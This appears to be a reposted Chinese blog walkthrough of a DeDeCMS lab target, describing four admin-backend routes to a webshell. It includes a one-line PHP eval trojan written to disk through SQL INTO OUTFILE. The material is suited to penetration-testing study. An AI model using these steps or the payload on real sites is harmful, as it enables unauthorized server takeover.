欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 房产 > 建筑 > DeDeCMS靶场漏洞复现

DeDeCMS靶场漏洞复现

2024/10/25 15:33:07 来源:https://blog.csdn.net/2401_82451607/article/details/142262638  浏览:    关键词:DeDeCMS靶场漏洞复现

打开靶场地址

姿势一:通过文件管理器上传webshell

1.登录后台

dedecms默认的后台登录地址为/dede

2.在附加管理里的文件式管理器中有文件上传

3.上传木马文件

4.访问木马文件 并连接

姿势二:修改模板文件获取webshell

1.点击模板里面的默认模板管理

找到index.html修改第一行内容为一句话木马

2.点击生成按钮里的更新主页html

修改主页位置为../index.php

首页模式改为生成静态

3.访问index.php文件 并连接

姿势三:后台任意命令执行获取webshell

1.点击模块里面的广告管理 添加一个广告

2.在代码块里写入一句话木马

3.点击管理代码

访问木马路径 并进行连接

姿势四:sql命令行工具获取webshell

1.打开系统里的sql命令行工具

2.执行sql命令写入一句话木马

select '<?php @eval($_POST[cmd]);?>' into outfile "D:/phpstudy_pro/www/111.php"

可以成功创建php木马文件

3.访问木马并进行连接

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com